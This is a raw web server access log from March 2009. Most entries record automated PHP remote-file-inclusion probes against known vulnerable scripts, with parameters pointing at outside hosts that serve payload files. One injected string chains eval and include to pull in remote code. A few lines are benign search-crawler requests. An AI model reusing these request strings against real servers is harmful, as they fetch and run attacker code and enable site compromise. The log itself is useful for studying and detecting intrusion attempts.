78.111.80.24 - - [31/Mar/2009:04:22:56 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
78.111.80.24 - - [31/Mar/2009:04:22:56 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
78.111.80.24 - - [31/Mar/2009:04:22:56 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
78.111.80.24 - - [31/Mar/2009:04:23:04 -0500] "GET /logs/access_log.1235001600//admin/spaw/spaw_control.class.php?spaw_root=http://www.c868z.cn/FX29ID1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
148.245.102.115 - - [31/Mar/2009:04:23:58 -0500] "GET /logs//?DIR_PREFIX=http://www.r-sauna.ru//assets/cache/id1.txt?%0D? HTTP/1.1" 200 36689 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
148.245.102.115 - - [31/Mar/2009:04:24:47 -0500] "GET /logs/access_log.1234483200//?DIR_PREFIX=http://www.r-sauna.ru//assets/cache/id1.txt?%0D? HTTP/1.1" 404 311 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
202.58.65.23 - - [31/Mar/2009:04:27:29 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
202.58.65.23 - - [31/Mar/2009:04:27:30 -0500] "GET //skin/zero_vote/error.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
202.58.65.23 - - [31/Mar/2009:04:29:15 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
202.58.65.23 - - [31/Mar/2009:04:29:16 -0500] "GET //skin/zero_vote/error.php?dir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
148.245.102.115 - - [31/Mar/2009:04:29:33 -0500] "GET //?DIR_PREFIX=http://www.r-sauna.ru//assets/cache/id.txt?%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
148.245.102.115 - - [31/Mar/2009:04:29:40 -0500] "GET /logs//?DIR_PREFIX=http://www.r-sauna.ru//assets/cache/id.txt?%0D?? HTTP/1.1" 200 183720 "-""libwww-perl/5.805"
88.198.10.3 - - [31/Mar/2009:04:30:06 -0500] "GET /logs//admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt%0D?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
88.198.10.3 - - [31/Mar/2009:04:30:06 -0500] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.phonesquare.com/shop/psdownload_engine//admin/includes/spaw/zeus1.txt%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
218.27.203.107 - - [31/Mar/2009:04:31:19 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:04:31:20 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:04:31:20 -0500] "GET //config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:04:31:26 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:04:31:28 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:04:31:28 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:04:31:29 -0500] "GET //config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:04:31:37 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:04:36:27 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:04:36:27 -0500] "GET /logs/access_log.1235692800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
69.50.208.139 - - [31/Mar/2009:04:36:27 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:04:38:40 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:04:38:40 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:04:38:40 -0500] "GET /logs/access_log.1230163200/lostpasswd.php?env[include_prefix]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:04:38:57 -0500] "GET /logs/access_log.1235952000/lostpasswd.php?env[include_prefix]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.249.95.103 - - [31/Mar/2009:04:39:17 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.249.95.103 - - [31/Mar/2009:04:39:17 -0500] "GET /logs/access_log.1235692800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.249.95.103 - - [31/Mar/2009:04:39:17 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:04:40:57 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:04:40:57 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
77.232.66.20 - - [31/Mar/2009:04:40:57 -0500] "GET /logs/access_log.1235692800/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
92.48.193.55 - - [31/Mar/2009:04:47:24 -0500] "GET /logs/access_log.1228608000 HTTP/1.0" 200 12125 "http://fortpit.pconline.com/logs/access_log.1228608000""Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)"
65.55.208.123 - - [31/Mar/2009:04:53:21 -0500] "GET /logs/access_log.1160352000 HTTP/1.1" 200 1129 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [31/Mar/2009:04:53:21 -0500] "GET /logs/access_log.1171756800 HTTP/1.1" 200 7168 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
81.12.13.152 - - [31/Mar/2009:04:54:30 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.iran-eschool.com//images/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:30 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.iran-eschool.com//images/shirohige/fxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:30 -0500] "GET /logs/access_log.1234137600//modules/vwar/admin/admin.php?vwar_root=http://www.iran-eschool.com//images/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:34 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:35 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:35 -0500] "GET /logs/access_log.1234137600//modules/vwar/admin/admin.php?vwar_root=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:35 -0500] "GET /logs/access_log.1235347200//modules/vwar/admin/admin.php?vwar_root=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:35 -0500] "GET /logs/access_log.1231113600//modules/vwar/admin/admin.php?vwar_root=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:35 -0500] "GET /logs/access_log.1233878400//modules/vwar/admin/admin.php?vwar_root=http://tothebit.com/wp/wpdata/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:36 -0500] "GET /logs/access_log.1235347200//modules/vwar/admin/admin.php?vwar_root=http://www.iran-eschool.com//images/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:36 -0500] "GET /logs/access_log.1231113600//modules/vwar/admin/admin.php?vwar_root=http://www.iran-eschool.com//images/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
81.12.13.152 - - [31/Mar/2009:04:54:36 -0500] "GET /logs/access_log.1233878400//modules/vwar/admin/admin.php?vwar_root=http://www.iran-eschool.com//images/shirohige/fxid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
201.72.166.52 - - [31/Mar/2009:04:55:22 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
201.72.166.52 - - [31/Mar/2009:04:55:22 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://3sk3nt.kit.net/safe.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
65.55.208.139 - - [31/Mar/2009:04:56:16 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [31/Mar/2009:04:56:16 -0500] "GET /logs/access_log.1133740800 HTTP/1.1" 200 130 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [31/Mar/2009:04:56:17 -0500] "GET /logs/access_log.1198281600 HTTP/1.1" 200 1069 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [31/Mar/2009:04:56:17 -0500] "GET /logs/access_log.1135382400 HTTP/1.1" 200 1190 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.111.154.15 - - [31/Mar/2009:04:59:44 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [31/Mar/2009:04:59:44 -0500] "GET /?M=A HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
207.182.137.218 - - [31/Mar/2009:05:02:21 -0500] "GET ///e404.php?DOCUMENT_ROOT=http://www.geocities.com/arifkuro/idpit.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
207.182.137.218 - - [31/Mar/2009:05:02:21 -0500] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.geocities.com/arifkuro/idpit.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
207.182.137.218 - - [31/Mar/2009:05:02:21 -0500] "GET /logs/access_log.1233619200///e404.php?DOCUMENT_ROOT=http://www.geocities.com/arifkuro/idpit.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
202.165.244.10 - - [31/Mar/2009:05:03:20 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:05:03:20 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:05:03:20 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.165.244.10 - - [31/Mar/2009:05:03:24 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fuscaclubedealagoas.com.br/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.182.137.218 - - [31/Mar/2009:05:04:29 -0500] "GET /logs///e404.php?DOCUMENT_ROOT=http://www.geocities.com/aardua82/idq.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.820"
207.182.137.218 - - [31/Mar/2009:05:04:29 -0500] "GET ///e404.php?DOCUMENT_ROOT=http://www.geocities.com/aardua82/idq.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.820"
207.182.137.218 - - [31/Mar/2009:05:05:05 -0500] "GET /logs/access_log.1235692800///e404.php?DOCUMENT_ROOT=http://www.geocities.com/arifkuro/idpit.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
65.98.100.202 - - [31/Mar/2009:05:39:13 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:05:39:13 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:05:39:22 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:05:39:22 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:05:47:49 -0500] "GET ///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:05:47:49 -0500] "GET /logs///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:05:47:50 -0500] "GET /logs///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:05:47:50 -0500] "GET ///bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
211.105.96.41 - - [31/Mar/2009:05:48:24 -0500] "GET /logs//popup.php?path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.105.96.41 - - [31/Mar/2009:05:48:25 -0500] "GET //popup.php?path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.105.96.41 - - [31/Mar/2009:05:48:25 -0500] "GET /logs/access_log.1234828800//popup.php?path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.100.226 - - [31/Mar/2009:05:56:49 -0500] "GET /logs//scripts/update_trailer.php?context[path_to_root]=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
74.52.100.226 - - [31/Mar/2009:05:56:49 -0500] "GET //scripts/update_trailer.php?context[path_to_root]=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
89.111.173.113 - - [31/Mar/2009:06:04:12 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://lottemp3.com/BBS/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.111.173.113 - - [31/Mar/2009:06:04:13 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://lottemp3.com/BBS/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
65.98.100.202 - - [31/Mar/2009:06:04:27 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:06:04:30 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:06:04:44 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
65.98.100.202 - - [31/Mar/2009:06:04:44 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vampires-fifa-liga.de/twomichael/tmp/release.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
148.245.102.115 - - [31/Mar/2009:06:11:15 -0500] "GET //add.php?APB_rp=http://www.r-sauna.ru//assets/cache/id1.txt?%0D? HTTP/1.1" 404 291 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
148.245.102.115 - - [31/Mar/2009:06:12:09 -0500] "GET /logs/access_log.1232236800//add.php?APB_rp=http://www.r-sauna.ru//assets/cache/id1.txt?%0D? HTTP/1.1" 404 318 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
148.245.102.115 - - [31/Mar/2009:06:17:10 -0500] "GET /logs//add.php?APB_rp=http://www.r-sauna.ru//assets/cache/id.txt?%0D?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
148.245.102.115 - - [31/Mar/2009:06:17:10 -0500] "GET //add.php?APB_rp=http://www.r-sauna.ru//assets/cache/id.txt?%0D?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
74.52.100.226 - - [31/Mar/2009:06:23:13 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
74.52.100.226 - - [31/Mar/2009:06:23:13 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.festiwal.zhp.info//components/Scanid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
200.85.128.9 - - [31/Mar/2009:06:24:14 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://roadone.net/board//data/terror.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
200.85.128.9 - - [31/Mar/2009:06:24:14 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://roadone.net/board//data/terror.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
200.85.128.9 - - [31/Mar/2009:06:24:14 -0500] "GET //include/bbs.lib.inc.php?site_path=http://roadone.net/board//data/terror.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
200.85.128.9 - - [31/Mar/2009:06:24:14 -0500] "GET //include/bbs.lib.inc.php?site_path=http://roadone.net/board//data/terror.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
65.55.208.138 - - [31/Mar/2009:06:31:17 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [31/Mar/2009:06:31:17 -0500] "GET /logs/access_log.1171065600 HTTP/1.1" 200 6820 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [31/Mar/2009:06:31:18 -0500] "GET /logs/access_log.1191888000 HTTP/1.1" 200 3240 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [31/Mar/2009:06:31:18 -0500] "GET /logs/access_log.1106870400 HTTP/1.1" 200 130 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
200.85.128.9 - - [31/Mar/2009:06:34:36 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://roadone.net/board//data/gefel.txt%0D? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.85.128.9 - - [31/Mar/2009:06:34:36 -0500] "GET //include/bbs.lib.inc.php?site_path=http://roadone.net/board//data/gefel.txt%0D? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
200.85.128.9 - - [31/Mar/2009:06:34:36 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://roadone.net/board//data/gefel.txt%0D? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
212.227.57.13 - - [31/Mar/2009:06:34:52 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://hredu.net/bbs//skin/zero_vote/images/idoke.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
212.227.57.13 - - [31/Mar/2009:06:34:52 -0500] "GET /skin/zero_vote/error.php?dir=http://hredu.net/bbs//skin/zero_vote/images/idoke.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
200.85.128.9 - - [31/Mar/2009:06:35:13 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://roadone.net/board//data/gefel.txt%0D? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
218.27.203.107 - - [31/Mar/2009:06:38:44 -0500] "GET //config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:06:38:44 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:06:38:44 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:06:38:44 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:06:39:27 -0500] "GET //config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:06:39:27 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:06:39:27 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.27.203.107 - - [31/Mar/2009:06:39:28 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.105.96.41 - - [31/Mar/2009:06:45:02 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.105.96.41 - - [31/Mar/2009:06:45:02 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.105.96.41 - - [31/Mar/2009:06:45:02 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.105.96.41 - - [31/Mar/2009:06:46:23 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dantesjuice.com/maksim/cmdtemp/FX29ID1.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:48:09 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:48:09 -0500] "GET /logs/access_log.1231459200//skin/zero_vote/ask_password.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:48:09 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
85.25.94.44 - - [31/Mar/2009:06:48:09 -0500] "GET /logs/access_log.1231545600//skin/zero_vote/ask_password.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
